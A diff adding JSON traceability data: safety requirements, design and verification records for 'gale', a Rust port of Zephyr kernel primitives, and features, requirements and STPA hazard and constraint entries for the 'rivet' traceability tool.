+      ],
+      "title": "M3: try_lock when unlocked sets owner, lock_count = 1",
+      "type": "sw-req"
+    },
+    {
+      "description": "After signal or broadcast, the condvar invariant (wait queue sorted by priority) is maintained. Maps to condvar.c:44-96.\n",
+      "id": "SWREQ-CV-C07",
+      "links": [
+        {
+          "target": "SYSREQ-CV-001",
+          "type": "derives-from"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "condvar",
+        "wait-queue",
+        "ordering",
+        "asil-d"
+      ],
+      "title": "C7: signal/broadcast preserve wait queue ordering",
+      "type": "sw-req"
+    },
+    {
+      "description": "Starting a CPU increments the active count. Returns EBUSY when all CPUs are already active.\n",
+      "id": "SWREQ-SM-SM02",
+      "links": [
+        {
+          "target": "SYSREQ-SM-001",
+          "type": "derives-from"
+        },
+        {
+          "target": "ZEP-SRS-SM-1",
+          "type": "satisfies"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "smp",
+        "start",
+        "asil-d"
+      ],
+      "title": "SM2: start_cpu when active < max increments by 1",
+      "type": "sw-req"
+    },
+    {
+      "description": "The primary C implementation of Zephyr's timeout subsystem. Contains z_add_timeout, z_abort_timeout, z_timeout_remaining, z_timeout_expires, sys_clock_announce, z_get_next_timeout_expiry, plus tick management and elapsed time calculation. The Gale port models tick arithmetic and timeout list ordering only.\n",
+      "id": "PROV-TO-001",
+      "links": [],
+      "status": "approved",
+      "tags": [
+        "upstream",
+        "timeout",
+        "kernel"
+      ],
+      "title": "Zephyr kernel/timeout.c — timeout subsystem implementation",
+      "type": "source-provenance"
+    },
+    {
+      "description": "The primary C implementation of Zephyr's poll subsystem. Contains k_poll_event_init, z_impl_k_poll, z_impl_k_poll_signal_init, z_impl_k_poll_signal_raise, z_impl_k_poll_signal_reset, z_impl_k_poll_signal_check, z_handle_obj_poll_events, plus internal event registration and readiness checking. The Gale port models the event state machine and signal flag operations only.\n",
+      "id": "PROV-PL-001",
+      "links": [],
+      "status": "approved",
+      "tags": [
+        "upstream",
+        "poll",
+        "kernel"
+      ],
+      "title": "Zephyr kernel/poll.c — poll event subsystem implementation",
+      "type": "source-provenance"
+    },
+    {
+      "description": "Split and merge operations preserve chunk conservation and allocated bytes. Split-then-merge is identity on chunk count.\n",
+      "id": "SWREQ-HP-HP08",
+      "links": [
+        {
+          "target": "SYSREQ-HP-001",
+          "type": "derives-from"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "heap",
+        "merge",
+        "asil-d"
+      ],
+      "title": "HP8: merge adjacent free chunks maintains invariant",
+      "type": "sw-req"
+    },
+    {
+      "description": "The sum of free and used slots always equals the capacity. Maps to stack.c:27-190.\n",
+      "id": "SWREQ-SK-SK07",
+      "links": [
+        {
+          "target": "SYSREQ-SK-001",
+          "type": "derives-from"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "stack",
+        "conservation",
+        "asil-d"
+      ],
+      "title": "SK7: num_free + num_used == capacity (conservation)",
+      "type": "sw-req"
+    },
+    {
+      "description": "Wake the highest-priority waiting thread. If wait queue is empty, return Empty (no-op). Otherwise unpend first thread and return Woke(thread).\n",
+      "id": "SWDD-CV-SIGNAL",
+      "links": [
+        {
+          "target": "SWARCH-CV-001",
+          "type": "refines"
+        },
+        {
+          "target": "SWREQ-CV-C02",
+          "type": "satisfies"
+        },
+        {
+          "target": "SWREQ-CV-C03",
+          "type": "satisfies"
+        },
+        {
+          "target": "SWREQ-CV-C07",
+          "type": "satisfies"
+        },
+        {
+          "target": "PROV-CV-001",
+          "type": "function-maps-to"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "condvar",
+        "signal"
+      ],
+      "title": "CondVar::signal — z_impl_k_condvar_signal port",
+      "type": "sw-detail-design"
+    },
+    {
+      "description": "The used block count is always between 0 and num_blocks inclusive. This is the fundamental invariant maintained across all operations.\n",
+      "id": "SWREQ-MS-MS01",
+      "links": [
+        {
+          "target": "SYSREQ-MS-001",
+          "type": "derives-from"
+        },
+        {
+          "target": "ZEP-SRS-MS-1",
+          "type": "satisfies"
+        },
+        {
+          "target": "ZEP-SRS-MS-3",
+          "type": "satisfies"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "mem-slab",
+        "invariant",
+        "asil-d"
+      ],
+      "title": "MS1: 0 <= num_used <= num_blocks (bounds invariant)",
+      "type": "sw-req"
+    },
+    {
+      "description": "No arithmetic operation on event counts or signal results causes integer overflow. All arithmetic is guarded by bounds checks.\n",
+      "id": "SWREQ-PL-PL08",
+      "links": [
+        {
+          "target": "SYSREQ-PL-001",
+          "type": "derives-from"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "poll",
+        "safety",
+        "overflow",
+        "asil-d"
+      ],
+      "title": "PL8: no overflow in poll event operations",
+      "type": "sw-req"
+    },
+    {
+      "description": "The Zephyr RTOS shall provide a mechanism that resets the semaphore count to zero.\n",
+      "id": "ZEP-SRS-5-16",
+      "links": [
+        {
+          "target": "ZEP-SYRS-14",
+          "type": "derives-from"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "zephyr",
+        "upstream",
+        "semaphore"
+      ],
+      "title": "Zephyr: Semaphore reset",
+      "type": "stakeholder-req"
+    },
+    {
+      "description": "When write_check or read_check is called on a pipe with the reset flag set, returns -ECANCELED without modifying state. Maps to pipe.c:147-271.\n",
+      "id": "SWREQ-PP-PP04",
+      "links": [
+        {
+          "target": "SYSREQ-PP-001",
+          "type": "derives-from"
+        },
+        {
+          "target": "ZEP-SRS-PP-2",
+          "type": "satisfies"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "pipe",
+        "reset",
+        "error",
+        "asil-d"
+      ],
+      "title": "PP4: write/read on resetting pipe returns ECANCELED",
+      "type": "sw-req"
+    },
+    {
+      "description": "The receive message source thread must be either a valid thread identifier or K_ANY (wildcard). Invalid sources are rejected.\n",
+      "id": "SWREQ-MB-MB02",
+      "links": [
+        {
+          "target": "SYSREQ-MB-001",
+          "type": "derives-from"
+        },
+        {
+          "target": "ZEP-SRS-MB-1",
+          "type": "satisfies"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "mbox",
+        "validation",
+        "asil-d"
+      ],
+      "title": "MB2: rx_source_thread valid or K_ANY",
+      "type": "sw-req"
+    },
+    {
+      "description": "No arithmetic operation on tick values causes integer overflow. All arithmetic is guarded by bounds checks or uses wrapping semantics where required.\n",
+      "id": "SWREQ-TO-TO08",
+      "links": [
+        {
+          "target": "SYSREQ-TO-001",
+          "type": "derives-from"
+        },
+        {
+          "target": "ZEP-SRS-TO-2",
+          "type": "satisfies"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "timeout",
+        "safety",
+        "overflow",
+        "asil-d"
+      ],
+      "title": "TO8: no overflow in tick arithmetic",
+      "type": "sw-req"
+    },
+    {
+      "description": "Reset status to 0 and set running = false.\n",
+      "id": "SWDD-TM-STOP",
+      "links": [
+        {
+          "target": "SWARCH-TM-001",
+          "type": "refines"
+        },
+        {
+          "target": "SWREQ-TM-TM04",
+          "type": "satisfies"
+        },
+        {
+          "target": "PROV-TM-001",
+          "type": "function-maps-to"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "timer",
+        "stop"
+      ],
+      "title": "Timer::stop — z_impl_k_timer_stop port",
+      "type": "sw-detail-design"
+    },
+    {
+      "description": "Full Zephyr kernel event test suite executed on qemu_cortex_m3 with CONFIG_GALE_KERNEL_EVENT=y. Tests exercise event post/set/clear, wait_any/wait_all, safe variants, and multi-thread delivery through the Gale FFI/C shim layer. Test suite: zephyr/tests/kernel/events/event_api.\n",
+      "id": "SV-EV-001",
+      "links": [
+        {
+          "target": "SYSREQ-EV-001",
+          "type": "verifies"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "system-verification",
+        "zephyr",
+        "qemu",
+        "sys-5"
+      ],
+      "title": "Event Zephyr system integration",
+      "type": "sys-verification"
+    },
+    {
+      "description": "Verus specifications in src/fault_decode.rs with requires/ensures clauses that formally verify fault decode properties (FH1-FH3) via SMT solving. Proves classify completeness, MMFAR/BFAR validity checking, and escalation detection. Executed via: bazel test //:verus_test\n",
+      "id": "FV-FD-001",
+      "links": [
+        {
+          "target": "SWREQ-FD-FH01",
+          "type": "verifies"
+        },
+        {
+          "target": "SWREQ-FD-FH02",
+          "type": "verifies"
+        },
+        {
+          "target": "SWREQ-FD-FH03",
+          "type": "verifies"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "formal-verification",
+        "verus",
+        "smt",
+        "swe-6"
+      ],
+      "title": "FaultDecode Verus formal verification (SMT/Z3)",
+      "type": "sw-verification"
+    },
+    {
+      "description": "The primary C implementation of Zephyr's futex. Contains z_impl_k_futex_wait, z_impl_k_futex_wake, plus userspace verification wrappers. The Gale port models the wait/wake state machine and woken count arithmetic only.\n",
+      "id": "PROV-FX-001",
+      "links": [],
+      "status": "approved",
+      "tags": [
+        "upstream",
+        "futex",
+        "kernel"
+      ],
+      "title": "Zephyr kernel/futex.c — fast userspace mutex implementation",
+      "type": "source-provenance"
+    },
+    {
+      "description": "Garbage collection (sector compaction) shall be a separate operation that the application explicitly invokes, not implicitly triggered by write operations.  This allows the application to schedule GC during non-safety-critical windows (e.g., key-off, idle periods) and ensures write latency is not affected by GC overhead.\n",
+      "id": "SYSREQ-ZMS-002",
+      "links": [
+        {
+          "target": "STKH-ZMS-002",
+          "type": "derives-from"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "storage",
+        "gc",
+        "deterministic",
+        "zms"
+      ],
+      "title": "GC decoupled from write path — application controls GC timing",
+      "type": "system-req"
+    },
+    {
+      "description": "SMP CPU lifecycle model with init/start_cpu/stop_cpu/resume_cpu/ global_lock/global_unlock. Tracks active CPU count and global lock reference count. No unsafe code. no_std compatible.\n",
+      "id": "SWARCH-SM-001",
+      "links": [
+        {
+          "target": "SWREQ-SM-SM01",
+          "type": "allocated-from"
+        },
+        {
+          "target": "SWREQ-SM-SM02",
+          "type": "allocated-from"
+        },
+        {
+          "target": "PROV-SM-001",
+          "type": "replaces"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "smp",
+        "architecture"
+      ],
+      "title": "SMP state module (gale::smp_state)",
+      "type": "sw-arch-component"
+    },
+    {
+      "description": "Zephyr ring buffer test suite executed on qemu_cortex_m3. Validates ring_buf_put, ring_buf_get, item API, and byte stream API with Gale integration. Test suite: zephyr/tests/lib/ring_buffer.\n",
+      "id": "SV-RB-001",
+      "links": [
+        {
+          "target": "SYSREQ-RB-001",
+          "type": "verifies"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "system-verification",
+        "zephyr",
+        "qemu",
+        "sys-5"
+      ],
+      "title": "Ring Buffer Zephyr system integration",
+      "type": "sys-verification"
+    },
+    {
+      "description": "Priority-ordered classification: HardFault (HFSR) > MemManage (CFSR 0-7) > BusFault (CFSR 8-15) > UsageFault (CFSR 16-31) > None.\n",
+      "id": "SWDD-FD-CLASSIFY",
+      "links": [
+        {
+          "target": "SWARCH-FD-001",
+          "type": "refines"
+        },
+        {
+          "target": "SWREQ-FD-FH01",
+          "type": "satisfies"
+        },
+        {
+          "target": "SWREQ-FD-FH03",
+          "type": "satisfies"
+        },
+        {
+          "target": "PROV-FD-001",
+          "type": "function-maps-to"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "fault-decode",
+        "classify"
+      ],
+      "title": "CortexMFault::classify — fault classification",
+      "type": "sw-detail-design"
+    },
+    {
+      "description": "No arithmetic operation on the item count causes integer overflow. All arithmetic is guarded by bounds checks.\n",
+      "id": "SWREQ-QU-QU06",
+      "links": [
+        {
+          "target": "SYSREQ-QU-001",
+          "type": "derives-from"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "queue",
+        "safety",
+        "overflow",
+        "asil-d"
+      ],
+      "title": "QU6: no arithmetic overflow in any operation",
+      "type": "sw-req"
+    },
+    {
+      "description": "The Zephyr RTOS shall track timeout deadlines as absolute tick values and maintain a sorted list of pending timeouts for efficient expiry processing.\n",
+      "id": "ZEP-SRS-TO-1",
+      "links": [
+        {
+          "target": "ZEP-SYRS-TO",
+          "type": "derives-from"
+        },
+        {
+          "target": "SYSREQ-TO-001",
+          "type": "satisfies"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "zephyr",
+        "upstream",
+        "timeout"
+      ],
+      "title": "Zephyr: Timeout Deadline Tracking",
+      "type": "stakeholder-req"
+    }
+  ],
+  "count": 846,
+  "prefix": "gale",
+  "project": "gale"
+}

--- a/data/gale/stats.json
+++ b/data/gale/stats.json
@@ -1,0 +1,28 @@
+{
+  "by_status": {
+    "active": 2,
+    "approved": 823,
+    "draft": 21
+  },
+  "by_type": {
+    "finding": 2,
+    "hazard": 6,
+    "loss": 3,
+    "safety-context": 2,
+    "safety-goal": 5,
+    "safety-solution": 4,
+    "safety-strategy": 1,
+    "source-provenance": 34,
+    "stakeholder-req": 108,
+    "sw-arch-component": 40,
+    "sw-detail-design": 98,
+    "sw-integration-verification": 35,
+    "sw-req": 266,
+    "sw-verification": 89,
+    "sys-verification": 40,
+    "system-constraint": 6,
+    "system-req": 49,
+    "unit-verification": 58
+  },
+  "total": 846
+}

--- a/data/rivet/artifacts.json
+++ b/data/rivet/artifacts.json
@@ -1,0 +1,12274 @@
+{
+  "artifacts": [
+    {
+      "description": "\nCI pipeline reports validation as passing when it actually\n\nexited with a non-zero code.\n",
+      "id": "UCA-I-3",
+      "links": [
+        {
+          "target": "H-3",
+          "type": "leads-to-hazard"
+        },
+        {
+          "target": "H-6",
+          "type": "leads-to-hazard"
+        },
+        {
+          "target": "CTRL-CI",
+          "type": "issued-by"
+        }
+      ],
+      "status": "-",
+      "tags": [],
+      "title": "",
+      "type": "uca"
+    },
+    {
+      "description": "Import/export artifacts in canonical generic YAML format with explicit type, links array, and fields map.\n",
+      "id": "FEAT-002",
+      "links": [
+        {
+          "target": "REQ-001",
+          "type": "satisfies"
+        },
+        {
+          "target": "DD-032",
+          "type": "implements"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "adapter",
+        "phase-1"
+      ],
+      "title": "Generic YAML adapter",
+      "type": "feature"
+    },
+    {
+      "description": "Scans test source code for rivet traceability markers (Rust attributes, Python decorators, comment tags) and test result files (JUnit XML, cargo test JSON). Injects ephemeral test nodes into the link graph with verifies links to referenced artifacts. Supports configurable marker patterns per language and a coverage report via rivet coverage --tests.\n",
+      "id": "FEAT-043",
+      "links": [
+        {
+          "target": "REQ-026",
+          "type": "satisfies"
+        },
+        {
+          "target": "DD-021",
+          "type": "implements"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "testing",
+        "traceability",
+        "automation",
+        "phase-3"
+      ],
+      "title": "Test traceability source scanner",
+      "type": "feature"
+    },
+    {
+      "description": "\nA MODULE.bazel file uses `load(\"@rules_rust//rust:defs.bzl\",\n\"rust_library\")`\n\nfollowed by a macro call that declares additional bazel_deps.\n\nThe parser does not recognize load() statements and silently\n\nskips the line [UCA-C-16]. The macro-declared dependencies are\n\ninvisible to Rivet. Cross-repo links to artifacts in those\n\nrepos are reported as broken when they actually exist in the\n\nundiscovered external repos.\n",
+      "id": "LS-C-11",
+      "links": [
+        {
+          "target": "UCA-C-16",
+          "type": "caused-by-uca"
+        },
+        {
+          "target": "H-11",
+          "type": "leads-to-hazard"
+        }
+      ],
+      "status": "-",
+      "tags": [],
+      "title": "Parser silently skips load() statement containing dependency",
+      "type": "loss-scenario"
+    },
+    {
+      "description": "Validate artifacts against schema: known types, required fields, allowed values, link cardinality, link target types, traceability rules (forward and backward).\n",
+      "id": "FEAT-005",
+      "links": [
+        {
+          "target": "REQ-004",
+          "type": "satisfies"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "validation",
+        "phase-1"
+      ],
+      "title": "Validation engine",
+      "type": "feature"
+    },
+    {
+      "description": "HTML rendering extracted from serve/views.rs into a render/ module with pure functions taking RenderContext and returning HTML strings. Serve wraps in page/embed/print layouts. LSP returns via custom rivet/render request for VS Code WebViews. Future HTML export calls the same functions for static site generation.\n",
+      "id": "DD-041",
+      "links": [
+        {
+          "target": "FEAT-066",
+          "type": "implements"
+        },
+        {
+          "target": "REQ-007",
+          "type": "satisfies"
+        }
+      ],
+      "status": "active",
+      "tags": [
+        "architecture",
+        "rendering",
+        "vscode"
+      ],
+      "title": "Shared render module for serve, LSP, and export",
+      "type": "design-decision"
+    },
+    {
+      "description": "\nAn artifact's description field contains `<script>` tags or\n\n`onerror` attributes. The dashboard's HTML rendering pipeline\n\nincludes the content without sanitization in the artifact detail\n\nview,\nenabling script execution in the viewer's browser.\n",
+      "id": "H-13.1",
+      "links": [
+        {
+          "target": "H-13",
+          "type": "refines"
+        }
+      ],
+      "status": "-",
+      "tags": [],
+      "title": "Rivet dashboard renders artifact descriptions containing script injection",
+      "type": "sub-hazard"
+    },
+    {
+      "description": "An adversary with access to an upstream artifact source (git remote, OSLC server, ReqIF export) injects crafted artifacts that pass Rivet's validation but introduce false or dangerous traceability links. Engineers unknowingly incorporate adversary-controlled requirements or safety constraints into the system design.\n",
+      "id": "SL-5",
+      "links": [],
+      "status": "approved",
+      "tags": [],
+      "title": "Supply-chain integrity loss — malicious artifacts injected via dependencies",
+      "type": "sec-loss"
+    },
+    {
+      "description": "",
+      "id": "UCA-VAR-003",
+      "links": [
+        {
+          "target": "CTRL-CORE",
+          "type": "issued-by"
+        },
+        {
+          "target": "H-VAR-003",
+          "type": "leads-to-hazard"
+        }
+      ],
+      "status": "-",
+      "tags": [],
+      "title": "Core engine does not re-validate bindings when artifacts change",
+      "type": "uca"
+    },
+    {
+      "description": "Tests in stpa_roundtrip.rs that verify STPA schema loading, artifact type and link type presence, store insert/lookup, duplicate ID rejection, and broken link detection within the STPA domain.\n",
+      "id": "TEST-002",
+      "links": [
+        {
+          "target": "REQ-002",
+          "type": "verifies"
+        },
+        {
+          "target": "REQ-004",
+          "type": "verifies"
+        },
+        {
+          "target": "REQ-014",
+          "type": "satisfies"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "testing",
+        "stpa",
+        "swe-5"
+      ],
+      "title": "STPA adapter and schema tests",
+      "type": "feature"
+    },
+    {
+      "description": "The system must support named variant configurations that select a subset of features from a feature model. A constraint solver must propagate implications (selecting feature A forces feature B via constraints), detect conflicts (mutually exclusive selections), and validate that the final feature set satisfies all cross-tree constraints. Invalid configurations must produce clear diagnostics identifying which constraints are violated. The solver must use propositional logic (boolean SAT) at minimum, with optional first-order extensions (forall/exists over feature sets) for advanced constraints.\n",
+      "id": "REQ-043",
+      "links": [
+        {
+          "target": "SC-VAR-002",
+          "type": "constraint-satisfies"
+        },
+        {
+          "target": "SC-VAR-006",
+          "type": "constraint-satisfies"
+        }
+      ],
+      "status": "draft",
+      "tags": [
+        "variant",
+        "ple",
+        "constraint-solver"
+      ],
+      "title": "Variant configuration with constraint solving",
+      "type": "requirement"
+    },
+    {
+      "description": "Rivet projects must be able to declare external dependencies on other rivet repositories and reference their artifacts using prefix:ID syntax.\n",
+      "id": "REQ-020",
+      "links": [
+        {
+          "target": "SC-10",
+          "type": "satisfies"
+        },
+        {
+          "target": "SC-19",
+          "type": "satisfies"
+        },
+        {
+          "target": "SC-10",
+          "type": "constraint-satisfies"
+        },
+        {
+          "target": "SC-19",
+          "type": "constraint-satisfies"
+        },
+        {
+          "target": "CC-C-20",
+          "type": "constraint-satisfies"
+        },
+        {
+          "target": "CC-L-6",
+          "type": "constraint-satisfies"
+        },
+        {
+          "target": "CC-L-7",
+          "type": "constraint-satisfies"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "cross-repo",
+        "traceability"
+      ],
+      "title": "Cross-repository artifact linking via prefixed IDs",
+      "type": "requirement"
+    },
+    {
+      "description": "Tests for markdown rendering and embed features (FEAT-058 through FEAT-060). Verifies pulldown-cmark heading, list, code block, and emphasis rendering, embed directive modifier syntax (full, links, upstream, downstream, chain, table), enriched ArtifactInfo resolution with forward links, backlinks, and resolved titles, and schema-driven link traversal in document output.\n",
+      "id": "TEST-026",
+      "links": [
+        {
+          "target": "REQ-032",
+          "type": "verifies"
+        },
+        {
+          "target": "REQ-033",
+          "type": "verifies"
+        },
+        {
+          "target": "REQ-014",
+          "type": "satisfies"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "testing",
+        "rendering",
+        "documents",
+        "swe-5"
+      ],
+      "title": "Markdown rendering and rich embed tests",
+      "type": "feature"
+    },
+    {
+      "description": "\nWhen a dashboard reload fails (due to YAML parse errors,\nschema\n\nload failures,\nor filesystem issues),\nthe server must:\n(a) return\n\nan error response to the reload request,\n(b) display a visible\n\n\"stale data\"\nbanner on all dashboard pages until a successful\n\nreload occurs,\n(c) log the specific error that caused the reload\n\nfailure.\n",
+      "id": "SC-18",
+      "links": [
+        {
+          "target": "H-16",
+          "type": "prevents"
+        }
+      ],
+      "status": "-",
+      "tags": [],
+      "title": "Rivet dashboard must report reload failures and indicate stale data state",
+      "type": "system-constraint"
+    },
+    {
+      "description": "",
+      "id": "CC-Q-5",
+      "links": [
+        {
+          "target": "CTRL-REQIF",
+          "type": "constrains-controller"
+        },
+        {
+          "target": "UCA-Q-5",
+          "type": "inverts-uca"
+        },
+        {
+          "target": "H-4",
+          "type": "prevents"
+        }
+      ],
+      "status": "-",
+      "tags": [],
+      "title": "",
+      "type": "controller-constraint"
+    },
+    {
+      "description": "CLI command for resolving computed embeds. Supports text and HTML output formats for scripting and testing.\n",
+      "id": "FEAT-076",
+      "links": [
+        {
+          "target": "REQ-001",
+          "type": "satisfies"
+        }
+      ],
+      "status": "approved",
+      "tags": [],
+      "title": "rivet embed CLI command",
+      "type": "feature"
+    },
+    {
+      "description": "Use a flat module structure (rivet-core, rivet-cli) rather than deeply nested module trees. Follow modern Rust AST-style patterns.\n",
+      "id": "DD-006",
+      "links": [
+        {
+          "target": "REQ-001",
+          "type": "satisfies"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "architecture"
+      ],
+      "title": "Flat crate structure",
+      "type": "design-decision"
+    },
+    {
+      "description": "\nThe HTML export shows delta values,\ncoverage,\nor diagnostics\n\nthat don't match the actual project state. A compliance reviewer\n\n(or notified body for EU AI Act) relies on incorrect data.\n",
+      "id": "L-IMPL-001",
+      "links": [],
+      "status": "-",
+      "tags": [],
+      "title": "Exported compliance report contains stale or incorrect data",
+      "type": "loss"
+    },
+    {
+      "description": "\nOSLC client does not report sync failures to the CLI/developer.\n",
+      "id": "UCA-O-3",
+      "links": [
+        {
+          "target": "H-2",
+          "type": "leads-to-hazard"
+        },
+        {
+          "target": "H-1",
+          "type": "leads-to-hazard"
+        },
+        {
+          "target": "CTRL-OSLC",
+          "type": "issued-by"
+        }
+      ],
+      "status": "-",
+      "tags": [],
+      "title": "",
+      "type": "uca"
+    },
+    {
+      "description": "\nOSLC client syncs during an active local editing session,\n\ncreating merge conflicts.\n",
+      "id": "UCA-O-9",
+      "links": [
+        {
+          "target": "H-5",
+          "type": "leads-to-hazard"
+        },
+        {
+          "target": "H-3",
+          "type": "leads-to-hazard"
+        },
+        {
+          "target": "CTRL-OSLC",
+          "type": "issued-by"
+        }
+      ],
+      "status": "-",
+      "tags": [],
+      "title": "",
+      "type": "uca"
+    },
+    {
+      "description": "Support OMG ReqIF 1.2 XML format for cross-organization requirements interchange. Import ReqIF into trace artifacts, export trace artifacts to ReqIF.\n",
+      "id": "REQ-005",
+      "links": [
+        {
+          "target": "SC-4",
+          "type": "satisfies"
+        },
+        {
+          "target": "SC-9",
+          "type": "satisfies"
+        },
+        {
+          "target": "SC-4",
+          "type": "constraint-satisfies"
+        },
+        {
+          "target": "SC-9",
+          "type": "constraint-satisfies"
+        },
+        {
+          "target": "CC-Q-1",
+          "type": "constraint-satisfies"
+        },
+        {
+          "target": "CC-Q-2",
+          "type": "constraint-satisfies"
+        },
+        {
+          "target": "CC-Q-3",
+          "type": "constraint-satisfies"
+        },
+        {
+          "target": "CC-Q-4",
+          "type": "constraint-satisfies"
+        },
+        {
+          "target": "CC-Q-5",
+          "type": "constraint-satisfies"
+        },
+        {
+          "target": "CC-Q-6",
+          "type": "constraint-satisfies"
+        },
+        {
+          "target": "CC-Q-7",
+          "type": "constraint-satisfies"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "interchange",
+        "reqif"
+      ],
+      "title": "ReqIF 1.2 import/export",
+      "type": "requirement"
+    },
+    {
+      "description": "Broken [[ID]] references in markdown documents are surfaced as LSP diagnostics with file and line number.\n",
+      "id": "FEAT-086",
+      "links": [
+        {
+          "target": "REQ-002",
+          "type": "satisfies"
+        }
+      ],
+      "status": "approved",
+      "tags": [],
+      "title": "LSP validates document [[ID]] references",
+      "type": "feature"
+    },
+    {
+      "description": "\nA commit message contains the trailer \"Refs:\nISO-26262,\nMISRA-C2012\".\n\nThe is_artifact_id() function matches any string with uppercase\n\nprefix + hyphen + digits. \"ISO-26262\" matches (prefix=\"ISO\",\n\nsuffix=\"26262\") and is extracted as an artifact reference [UCA-C-18].\n\nThe store does not contain \"ISO-26262\",\nso it is counted as a\n\nbroken reference. However,\nin the commit analysis summary,\nit\n\ninflates the \"linked commits\" count because the commit has at\n\nleast one artifact reference (even though it's a false positive).\n",
+      "id": "LS-C-14",
+      "links": [
+        {
+          "target": "UCA-C-18",
+          "type": "caused-by-uca"
+        },
+        {
+          "target": "H-15",
+          "type": "leads-to-hazard"
+        }
+      ],
+      "status": "-",
+      "tags": [],
+      "title": "Commit trailer false positive from non-artifact ID",
+      "type": "loss-scenario"
+    },
+    {
+      "description": "\nInability to reconstruct the history of traceability decisions —\n\nwho changed a link,\nwhen,\nand why.  Without a reliable audit trail,\n\nroot-cause analysis after incidents is impaired and regulatory\n\npost-market obligations cannot be met.\n",
+      "id": "L-6",
+      "links": [],
+      "status": "-",
+      "tags": [],
+      "title": "Loss of audit trail",
+      "type": "loss"
+    },
+    {
+      "description": "The system must support a binding model that maps features from the logical feature model to implementation artifacts and source code globs. Bindings are stored in separate YAML files, maintaining the three-layer separation (feature model / variant config / binding). Each feature can bind to zero or more artifact IDs and zero or more source file glob patterns. Validation must detect: unbound features (feature with no artifacts), unbound artifacts (artifacts not mapped to any feature), and stale bindings (referencing deleted artifacts or non-existent source paths).\n",
+      "id": "REQ-044",
+      "links": [
+        {
+          "target": "SC-VAR-003",
+          "type": "constraint-satisfies"
+        },
+        {
+          "target": "SC-VAR-005",
+          "type": "constraint-satisfies"
+        }
+      ],
+      "status": "draft",
+      "tags": [
+        "variant",
+        "ple",
+        "binding"
+      ],
+      "title": "Feature-to-artifact binding model",
+      "type": "requirement"
+    },
+    {
+      "description": "\nWhen one file fails to parse,\ndiagnostics for OTHER files must\n\nnot change. Broken-link errors caused by a parsed-out file\n\nappearing to vanish are cascading false positives.\n",
+      "id": "SC-LSP-007",
+      "links": [
+        {
+          "target": "H-LSP-002",
+          "type": "prevents"
+        }
+      ],
+      "status": "-",
+      "tags": [],
+      "title": "LSP MUST NOT cascade errors from parse failures",
+      "type": "system-constraint"
+    },
+    {
+      "description": "The MCP server uses stdio transport (not HTTP) and does not listen on any network port. Access is limited to the local process that spawned it. Network transport requires explicit opt-in via --transport http.\n",
+      "id": "SSC-IMPL-002",
+      "links": [
+        {
+          "target": "SH-IMPL-002",
+          "type": "prevents-sec-hazard"
+        }
+      ],
+      "status": "draft",
+      "tags": [],
+      "title": "MCP server MUST only bind to localhost stdio",
+      "type": "sec-constraint"
+    },
+    {
+      "description": "The salsa incremental validation pipeline is now the default for rivet validate. Old direct path available via --direct flag.\n",
+      "id": "FEAT-087",
+      "links": [
+        {
+          "target": "REQ-002",
+          "type": "satisfies"
+        }
+      ],
+      "status": "approved",
+      "tags": [],
+      "title": "Salsa incremental validation as default",
+      "type": "feature"
+    },
+    {
+      "description": "\nThe validator must handle YAML types (boolean,\nnumber,\nnull)\n\nin fields where the schema expects strings. Silent type coercion\n\nthat bypasses allowed-values checks is a false negative.\n",
+      "id": "SC-LSP-005",
+      "links": [
+        {
+          "target": "H-LSP-001",
+          "type": "prevents"
+        }
+      ],
+      "status": "-",
+      "tags": [],
+      "title": "YAML type coercion MUST be handled explicitly",
+      "type": "system-constraint"
+    },
+    {
+      "description": "Unit tests in reqif.rs and integration tests in integration.rs that verify ReqIF 1.2 XML export produces valid structure, minimal ReqIF parsing, full roundtrip preservation of artifacts/links/fields, and ReqIF-to-store integration.\n",
+      "id": "TEST-005",
+      "links": [
+        {
+          "target": "REQ-005",
+          "type": "verifies"
+        },
+        {
+          "target": "REQ-014",
+          "type": "satisfies"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "testing",
+        "reqif",
+        "swe-5"
+      ],
+      "title": "ReqIF roundtrip tests",
+      "type": "feature"
+    },
+    {
+      "description": "The validation engine must support conditional rules where field requirements or link cardinality depend on the value of another field. For example, an artifact with status \"approved\" must have a non-empty verification-criteria field, or an artifact with safety level ASIL_B must have mitigated_by links. This enables safety-critical constraint enforcement that static per-type validation cannot express. Contradictory conditional rules must be detected at schema load time.\n",
+      "id": "REQ-023",
+      "links": [
+        {
+          "target": "SC-12",
+          "type": "satisfies"
+        },
+        {
+          "target": "SC-12",
+          "type": "constraint-satisfies"
+        },
+        {
+          "target": "CC-C-12",
+          "type": "constraint-satisfies"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "validation",
+        "schema",
+        "safety"
+      ],
+      "title": "Conditional validation rules",
+      "type": "requirement"
+    },
+    {
+      "description": "Bridge schemas are standalone YAML files rather than embedded in either base schema.\n",
+      "id": "DD-047",
+      "links": [
+        {
+          "target": "REQ-010",
+          "type": "satisfies"
+        }
+      ],
+      "status": "approved",
+      "tags": [],
+      "title": "Schema bridges as separate YAML files",
+      "type": "design-decision"
+    },
+    {
